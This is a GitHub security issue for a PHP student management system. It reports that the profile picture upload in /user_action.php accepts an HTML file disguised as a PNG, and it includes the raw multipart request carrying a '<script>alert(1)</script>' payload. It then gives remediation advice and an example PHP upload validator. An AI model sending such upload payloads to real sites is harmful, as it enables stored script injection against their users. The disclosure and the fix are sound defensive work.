amirhamza05 / Student-Management-System

This is a simple web-based student management software written in PHP and JavaScript. It was specifically written for schools or educational organizations.
http://ems.tserm.com/

Security Vulnerability: Arbitrary file Upload and Execution #37

Open wr3nch0x1 opened 3 years ago

wr3nch0x1 commented 3 years ago

It is possible to upload a malicious file to run from the profile picture upload using http://ems.tserm.com/user_action.php

Vulnerable parameter: "filename"

Vulnerable file: /user_action.php

------WebKitFormBoundarycC5ce2YBWSdAerAB
Content-Disposition: form-data; name="file"; filename="**Untitled.png.html**"
Content-Type: image/png

**<script>alert(1)</script>**
------WebKitFormBoundarycC5ce2YBWSdAerAB--

Remediation: Do not allow users to upload files other than images.
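
One way to implement the remediation above on the server side, as an added example that is not part of the original report or of the project's code. The function name `store_profile_picture`, the allow-list, the 2 MiB limit and the destination directory are assumptions for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper: not from the Student-Management-System code base.
// Maps server-detected MIME types to the only extensions we will ever write.
const ALLOWED_IMAGE_TYPES = [
    'image/png'  => 'png',
    'image/jpeg' => 'jpg',
    'image/gif'  => 'gif',
];

/**
 * Validate an uploaded profile picture and store it under a server-chosen name.
 * $upload is one entry of $_FILES; $destDir is an assumed storage directory.
 * Returns the stored file name, or throws on rejection.
 */
function store_profile_picture(array $upload, string $destDir): string
{
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($upload['tmp_name'])) {
        throw new RuntimeException('Upload failed');
    }
    if ($upload['size'] > 2 * 1024 * 1024) {          // assumed 2 MiB limit
        throw new RuntimeException('File too large');
    }

    // Ignore $upload['type'] and $upload['name']: both are client-supplied
    // (the reported request claims image/png for a file named *.png.html).
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($upload['tmp_name']);
    if ($mime === false || !isset(ALLOWED_IMAGE_TYPES[$mime])) {
        throw new RuntimeException('Not an allowed image type');
    }
    // The content must also parse as an image, not just sniff as one.
    if (@getimagesize($upload['tmp_name']) === false) {
        throw new RuntimeException('Not a valid image');
    }

    // Server-generated name; the extension follows the detected type,
    // so the client's filename never decides how the file is served.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$mime];
    if (!move_uploaded_file($upload['tmp_name'], rtrim($destDir, '/') . '/' . $name)) {
        throw new RuntimeException('Could not store file');
    }
    return $name;
}
```

The upload directory should additionally be served with script execution disabled and with `X-Content-Type-Options: nosniff`, so that a file which slips past validation is still not interpreted as HTML or PHP.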